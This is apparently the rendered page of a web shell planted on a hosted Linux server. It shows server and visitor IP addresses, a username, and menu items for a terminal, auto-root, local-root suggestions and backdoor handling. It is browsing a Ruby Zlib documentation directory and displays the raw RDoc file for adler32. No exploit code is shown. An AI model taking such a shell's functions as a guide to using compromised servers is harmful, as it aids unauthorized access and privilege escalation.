Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby24 /
share /
ri /
2.4.0 /
system /
Zlib /
Delete
Unzip
Name
Size
Permission
Date
Action
BufError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
DataError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Deflate
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Error
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
GzipFile
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
GzipReader
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
GzipWriter
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Inflate
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
MemError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
NeedDict
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
StreamEnd
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
StreamError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
VersionError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
ZStream
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
adler32-c.ri
787
B
-rw-r--r--
2023-07-26 18:18
adler32_combine-c.ri
540
B
-rw-r--r--
2023-07-26 18:18
cdesc-Zlib.ri
10.11
KB
-rw-r--r--
2023-07-26 18:18
crc32-c.ri
576
B
-rw-r--r--
2023-07-26 18:18
crc32_combine-c.ri
518
B
-rw-r--r--
2023-07-26 18:18
crc_table-c.ri
329
B
-rw-r--r--
2023-07-26 18:18
deflate-c.ri
875
B
-rw-r--r--
2023-07-26 18:18
gunzip-c.ri
700
B
-rw-r--r--
2023-07-26 18:18
gzip-c.ri
918
B
-rw-r--r--
2023-07-26 18:18
inflate-c.ri
789
B
-rw-r--r--
2023-07-26 18:18
zlib_version-c.ri
340
B
-rw-r--r--
2023-07-26 18:18
Save
Rename
U:RDoc::AnyMethod[iI"adler32:ETI"Zlib::adler32;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"MCalculates Adler-32 checksum for +string+, and returns updated value of ;TI"P+adler+. If +string+ is omitted, it returns the Adler-32 initial value. If ;TI"O+adler+ is omitted, it assumes that the initial value is given to +adler+.;To:RDoc::Markup::BlankLine o; ; [I"Example usage:;T@o:RDoc::Markup::Verbatim; [ I"require "zlib" ;TI" ;TI"data = "foo" ;TI"=puts "Adler32 checksum: #{Zlib.adler32(data).to_s(16)}" ;TI""#=> Adler32 checksum: 2820145;T:@format0: @fileI"ext/zlib/zlib.c;T:0@omit_headings_from_table_of_contents_below0I"!Zlib.adler32(string, adler) ;T0[ I"(*args);T@FI" Zlib;TcRDoc::NormalModule00